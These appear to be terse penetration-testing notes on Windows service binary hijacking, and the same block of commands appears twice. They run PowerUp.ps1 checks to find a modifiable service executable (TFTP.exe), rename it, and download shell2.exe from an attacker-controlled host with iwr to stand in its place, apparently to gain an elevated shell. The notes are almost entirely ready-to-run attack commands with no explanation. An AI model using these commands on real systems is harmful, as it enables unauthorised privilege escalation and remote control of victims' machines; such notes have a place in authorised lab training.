Service Binary Hijacking
Import-Module ./PowerUp.ps1
Invoke-AllChecks
Get-ModifiableServiceFile
mv TFTP.exe TFTP.exe.bak
iwr -uri http://192.168.45.163/shell2.exe -Outfile TFTP.exe
Import-Module ./PowerUp.ps1
Invoke-AllChecks
Get-ModifiableServiceFile
mv TFTP.exe TFTP.exe.bak
iwr -uri http://192.168.45.163/shell2.exe -Outfile TFTP.exe